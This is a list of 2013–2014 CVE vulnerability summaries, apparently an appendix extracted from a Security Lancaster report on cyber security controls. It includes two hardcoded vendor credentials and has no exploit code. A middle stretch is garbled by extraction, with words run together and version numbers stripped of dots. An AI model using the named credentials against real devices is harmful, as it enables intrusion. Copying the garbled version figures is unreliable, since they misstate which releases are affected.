CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11, 4.1.x and 4.2.x before 4.2.7, and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803: ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.

CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.

CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.

CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."

CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."

CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."

CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."

CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem/.

CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."

CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.
CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.
CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.
CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.
CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.
CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget.dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.
CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.
CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.
CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability".
CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability".
CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability".
CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability".
CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.
CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.
CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.
CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.
CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.
CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.
CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.
CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.
CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2773.
CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.
CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2788.
CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.
CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.
CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.
